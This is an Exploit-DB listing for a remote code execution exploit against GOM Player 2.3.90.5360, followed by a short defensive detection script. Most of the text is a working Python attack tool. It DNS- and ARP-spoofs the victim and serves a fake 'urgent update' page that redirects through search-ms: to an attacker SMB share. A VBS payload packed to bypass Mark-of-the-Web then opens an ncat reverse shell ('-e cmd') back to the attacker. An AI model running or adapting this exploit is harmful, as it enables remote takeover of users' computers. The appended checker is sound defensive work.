GOM Player 2.3.90.5360 - Remote Code Execution (RCE)

Reported by M. Akil Gündoğan, 08 Sep 2023. Type: exploitdb. Source: www.exploit-db.com. 449 views.

GOM Player 2.3.90.5360 - Remote Code Execution (RCE) enables attackers to execute code on the target by exploiting the insecure HTTP connection in the IE component, impacting millions of users worldwide. The exploit uses DNS spoofing to redirect the victim to an attacker-created page, which then executes code on the target.

Code
# Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)
# Date: 26.08.2023
# Author: M. Akil Gündoğan
# Contact: https://twitter.com/akilgundogan
# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/
# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
# Version: 2.3.90.5360 
# Tested on: Windows 10 Pro x64 22H2 19045.3324
# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8

# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.

# Vulnerability Description: 
# The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the 
# SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.
# In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window. 

# Full disclosure, developers should be more careful about software security.

# Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.

# Some spaghetti and a bad code but it works :)

banner = """\033[38;5;196m+-----------------------------------------------------------+
|     GOM Player 2.3.90.5360 - Remote Code Execution        |
|   Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-)  |
+-----------------------------------------------------------+\033[0m""" +""" 
\033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""

import time,os,zipfile,subprocess,socket,sys

print(banner)

if os.geteuid() != 0:
    print("You need root privileges to run the exploit, please use sudo...")
    sys.exit(1)

targetIP = input("- Target IP address: ")
listenPort = input("- Listening port for Reverse Shell: ")

def fCreate(fileName,fileContent): # File create func. 
    f = open(fileName,"w")
    f.write(fileContent)
    f.close()    

gw = os.popen("ip -4 route show default").read().split()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((gw[2], 0))
ipaddr = s.getsockname()[0]
gateway = gw[2]
host = socket.gethostname()
print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host) 

print("\n[*]- Stage 1: Downloading necessary tools...")

smbFolderName = "GomUpdater" # change this (optional)
expWorkDir = "gomExploitDir" # change this (optional)
os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.
time.sleep(1) # It's necessary for exploit stability. 
os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating the smb-shared and web-shared subdirectories inside the working directory.
time.sleep(1) # It's necessary for exploit stability. 
os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncat
print("    [*] - Ncat has been downloaded.")
subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket
print("    [*] - Impacket has been downloaded.")
subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py
print("    [*] - DNSSpoof.py has been downloaded.")

print("[*]- Stage 2: Creating Attacker SMB Server...")
subprocess.Popen("cd gomExploitDir/impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.
time.sleep(5) # It's necessary for exploit stability. 

smbIP = ipaddr
spoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTP

print("[*]- Stage 3: Creating Attacker Web Page...")

# change this (optional) 
screenExpPage = """
<meta charset="utf-8">
<script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script> 
<script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""';
</script>
"""

fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)
time.sleep(3) # It's necessary for exploit stability. 

print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")
vbsCommand = '''Set shell=CreateObject("wscript.shell") 
Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")
WScript.Sleep 5000
Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)
vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)
fCreate(expWorkDir + "/payload.vbs",vbsCommand)

urlShortcut = '''[InternetShortcut]
URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbs
IDlist='''
fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)
time.sleep(3) # It's necessary for exploit stability. 
zipName = expWorkDir + "/smb-shared/archive.zip"
payload_filename = os.path.join(expWorkDir, "payload.vbs")  

with zipfile.ZipFile(zipName, "w") as malzip:
    malzip.write(payload_filename, arcname=os.path.basename(payload_filename))

print("[*]- Stage 5: Running the attacker's web server...")
subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.server
time.sleep(3) # It's necessary for exploit stability. 

print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")
subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...
time.sleep(10) # It's necessary for exploit stability.
os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target... 
os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.
print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")
subprocess.run("nc -lvnp " + listenPort,shell=True)
subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...
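A defender-side check added here (not part of the original exploit or the Vulners page): it parses a page body for search-ms: redirects whose location crumb points at a remote UNC share, the step the attacker page above relies on, and flags plaintext HTTP requests to gomlab.com hosts in proxy logs, the channel that DNS spoofing needs. The sample page body and log lines are constructed; the 192.0.2.10 share address and 10.0.0.x clients are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample page body, modelled on the redirect the exploit serves from
# the spoofed playinfo.gomlab.com host (the 192.0.2.10 share address is made up).
SAMPLE_HTML = """<meta charset="utf-8">
<script>window.location.href='search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C192.0.2.10';</script>
"""
# Constructed sample proxy log lines: client, method, URL, status.
PROXY_LOG = [
    "10.0.0.5 GET http://playinfo.gomlab.com/player/info.html 200",
    "10.0.0.5 GET https://www.gomlab.com/ 200",
    "10.0.0.7 GET http://example.org/index.html 200",
]
# A search-ms: URI may contain spaces, so stop only at a quote or tag boundary.
SEARCH_MS_RE = re.compile(r"search-ms:[^'\"<]+", re.IGNORECASE)

def parse_search_ms(uri):
    """Split a search-ms: URI into URL-decoded parameters (crumb may repeat)."""
    params = {}
    for part in uri.split(":", 1)[1].split("&"):
        key, _, value = part.partition("=")
        params.setdefault(key.lower(), []).append(unquote(value))
    return params

def remote_search_targets(html):
    """Return the UNC hosts that search-ms: redirects in an HTML body point at.
    A location:\\\\host crumb makes Explorer open that remote share, which is
    the step that puts the attacker's Updater.url in front of the user."""
    hosts = []
    for match in SEARCH_MS_RE.finditer(html):
        for crumb in parse_search_ms(match.group(0)).get("crumb", []):
            kind, _, value = crumb.partition(":")
            if kind.lower() == "location" and value.startswith("\\\\"):
                hosts.append(value.lstrip("\\").split("\\")[0])
    return hosts

def plaintext_gomlab_requests(lines):
    """Flag requests that reach a gomlab.com host over plaintext HTTP, the
    unauthenticated channel a DNS-spoofed server needs to substitute the page."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        url = urlsplit(fields[2])
        if url.scheme == "http" and (url.hostname or "").endswith("gomlab.com"):
            hits.append(fields[2])
    return hits
```

Either hit on its own is a reason to look closer: a search-ms: redirect to a remote share from a page that should only serve player information, or a GOM Player host being reached without TLS.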
